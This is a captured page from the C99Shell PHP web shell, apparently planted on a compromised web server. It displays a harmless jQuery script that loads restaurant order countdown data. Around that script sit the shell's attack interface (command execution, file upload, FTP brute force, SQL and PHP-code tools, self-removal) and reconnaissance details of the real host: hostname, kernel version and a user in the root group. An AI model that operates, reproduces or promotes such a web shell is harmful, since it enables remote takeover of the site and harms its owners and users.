!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/public/js/   drwxr-xr-x
Free 28.95 GB of 117.98 GB (24.54%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     order_time_count_down.js (1.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
$(document).ready(function () {
    const countDataTable = $('#countdownTable').DataTable({
        processing: true,
        serverSide: false,
        ajax: {
            url: '/check/order/countdown',
            type: 'GET',
            data: function(d) {
                d.restaurant_id = $('#restaurantFilter').val();
            },
            dataSrc: 'data',
            error: function(xhr) {
                console.error(xhr.responseText);
            }
        },
        columns: [
            { data: 'order_time' },
            { data: 'order_number' },
            { data: 'table_name' },
            { data: 'remaining_time' },
            { data: 'status' }
        ],
        language: {
            emptyTable: "No orders found"
        },
        dom: 'lrtp',
        pageLength: 20,
        lengthChange: false,
        paging: true,
    });

    function loadOrders() {
        $.ajax({
            url: '/check/order/countdown',
            method: 'GET',
            data: {
                restaurant_id: $('#restaurantFilter').val()
            },
            success: function(res) {
                if (res.status === 'success') {
                    countDataTable.clear().rows.add(res.data).draw();
                } else {
                    $('#order_time_countdown_data').html('<tr><td colspan="5">' + res.data + '</td></tr>');
                }
            },
            error: function(xhr) {
                console.error(xhr.responseText);
            }
        });
    }

    loadOrders();

    $('#restaurantFilter').on('change', function() {
        loadOrders();
        countDataTable.ajax.reload();
    });

    setInterval(() => {
        loadOrders();
    }, 5500);
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--